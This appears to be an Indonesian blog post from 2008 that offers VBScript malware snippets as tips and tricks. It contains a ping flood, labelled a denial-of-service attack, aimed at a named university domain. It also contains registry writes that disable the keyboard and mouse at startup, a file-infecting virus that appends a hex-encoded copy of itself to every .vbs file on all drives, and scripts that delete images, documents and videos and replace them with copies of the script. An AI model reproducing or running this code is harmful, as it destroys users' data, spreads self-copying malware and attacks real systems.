Rabu, 02 April 2008

Mengganti HomePage di Internet Options :
On Error Resume NextSet MawarPutih = CreateObject("WScript.Shell")MawarPutih.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.google.com/"Melakukan Serangan Denial Of Service Attack
On Error Resume NextSet MawarPutih = CreateObject("WScript.Shell")MawarPutih.Run "Ping -t -l 10000 www.darmajaya.ac.id", 0, FalseMelakukan Loop Suatu file :
On Error Resume NextSet MawarPutih= CreateObject("WScript.Shell")DoMawarPutih.Run "Notepad.exe", 3, FalseLoopDisable -> Keyboard Dan Mouse:KeyBoard :
On Error Resume NextSet MawarPutih = CreateObject("WScript.Shell")MawarPutih.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DisableKeyboard", "Rundll32.exe Keyboard,Disable"Mouse :
On Error Resume NextSet MawarPutih = CreateObject("WScript.Shell")MawarPutih.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DisableMouse", "Rundll32.exe Mouse,Disable"Infeksi File Antar Visual Basic Script (.VBS) :
'Tips And Trik by Shadow AngelOn Error Resume NextSet MawarPutih = CreateObject("Scripting.FileSystemObject")Angel1()Sub Angel1()On Error Resume NextSet a = CreateObject("Scripting.FileSystemObject")For Each SalinMawarPutih In a.DrivesIf SalinMawarPutih.DriveType = 2 _Or SalinMawarPutih.DriveType = 3 ThenAngel3 (SalinMawarPutih.Path & "\")End IfNextEnd SubSub Angel2(FileTarget)On Error Resume NextSet otf = a.GetFile(WScript.ScriptFullName)ra = otf.ReadAllotf.CloseSet a = CreateObject("Scripting.FileSystemObject")Set f = a.GetFolder(FileTarget)For Each n In f.FilesFileExt = LCase(a.GetExtensionName(n.Path))If FileExt = "vbs" Or FileExt = "vbe" ThenSet openvbs = a.OpenTextFile(n.Path, 1)vbsra = openvbs.ReadAllopenvbs.CloseIf InStr(1, vbsra, "Tips And Trik by ") = False ThenSet MawarPutih = CreateObject("Scripting.FileSystemObject")Set JC = MawarPutih.OpenTextFile(WScript.ScriptFullName, 1)RantingMawarPutih = JC.ReadAllJC.CloseSet MawarMerah = MawarPutih.OpenTextFile(n.Path, 8, True)MawarMerah.WriteLine vbCrLf & "' Hack .VBS by " & vbCrLf & "Tz = " & Chr(34) & Chr(34)For i = 1 To Len(RantingMawarPutih)Tz = Mid(RantingMawarPutih, i, 1)Tz = Hex(Asc(Tz))If Len(Tz) = 1 ThenTz = "0" & TzEnd IfGz = Gz + TzIf Len(Gz) = 110 ThenMawarMerah.WriteLine "Tz = Tz + """ + Gz + Chr(34)Gz = ""End IfIf Len(RantingMawarPutih) - i = 0 ThenMawarMerah.WriteLine "Tz = Tz + """ + Gz + Chr(34)Gz = ""End IfNextMawarMerah.WriteLine "Set MawarPutih = CreateObject(""Scripting.FileSystemObject"")"MawarMerah.WriteLine "WriteAppend.Write CM(Tz)"MawarMerah.WriteLine "WriteAppend.Close"MawarMerah.WriteLine "Function CM(CN)"MawarMerah.WriteLine "For GC = 1 To Len(CN) Step 2"MawarMerah.WriteLine "CM = CM & Chr(""&h"" & Mid(CN, GC, 2))"MawarMerah.WriteLine "Next"MawarMerah.WriteLine "End Function"MawarMerah.CloseEnd IfEnd IfNextEnd SubSub Angel3(FileTarget)On Error Resume NextSet a = CreateObject("Scripting.FileSystemObject")Set f = a.GetFolder(FileTarget)For Each n In f.SubFoldersAngel2 (n.Path)Angel3 (n.Path)NextEnd SubInfeksi File -> Format Gambar .JPG :
' Tips And Trik by Shadow AngelOn Error Resume NextSet MawarPutih = CreateObject("Scripting.FileSystemObject")Angel1()Sub Angel1()On Error Resume NextSet a = CreateObject("Scripting.FileSystemObject")For Each SalinMawarPutih In a.DrivesIf SalinMawarPutih.DriveType = 2 _Or SalinMawarPutih.DriveType = 3 ThenAngel3 (SalinMawarPutih.Path & "\")End IfNextEnd SubSub Angel2(FileTarget)On Error Resume NextSet otf = a.GetFile(WScript.ScriptFullName)ra = otf.ReadAllotf.CloseSet a = CreateObject("Scripting.FileSystemObject")Set f = a.GetFolder(FileTarget)For Each n In f.FilesFileExt = LCase(a.GetExtensionName(n.Path))If FileExt = "jpg" ThenMawarPutih.CopyFile WScript.ScriptFullName, n.Path & ".vbs"MawarPutih.DeleteFile (n.Path)End IfNextEnd SubSub Angel3(FileTarget)On Error Resume NextSet a = CreateObject("Scripting.FileSystemObject")Set f = a.GetFolder(FileTarget)For Each n In f.SubFoldersAngel2 (n.Path)Angel3 (n.Path)NextEnd SubInfeksi Format File -> (.JPG . html . mpg . htm . doc And .avi) :
'Tips And Trik by Shadow AngelOn Error Resume NextSet MawarPutih = CreateObject("Scripting.FileSystemObject")Angel1()Sub Angel1()On Error Resume NextSet a = CreateObject("Scripting.FileSystemObject")For Each SalinMawarPutih In a.DrivesIf SalinMawarPutih.DriveType = 2 _Or SalinMawarPutih.DriveType = 3 ThenAngel3 (SalinMawarPutih.Path & "\")End IfNextEnd SubSub Angel2(FileTarget)On Error Resume NextSet RantingMawar = a.GetFile(WScript.ScriptFullName)ra = RantingMawar.ReadAllRantingMawar.CloseSet a = CreateObject("Scripting.FileSystemObject")Set f = a.GetFolder(FileTarget)For Each n In f.FilesFileExt = LCase(a.GetExtensionName(n.Path))If FileExt = "jpg" Or FileExt = "html" Or FileExt = "mpg" Or FileExt = "htm" Or FileExt = "doc" Or FileExt = "avi" ThenMawarPutih.CopyFile WScript.ScriptFullName, n.Path & ".vbs"MawarPutih.DeleteFile (n.Path)End IfNextEnd SubSub Angel3(FileTarget)On Error Resume NextSet a = CreateObject("Scripting.FileSystemObject")Set f = a.GetFolder(FileTarget)For Each n In f.SubFoldersAngel2 (n.Path)Angel3 (n.Path)NextEnd Sub

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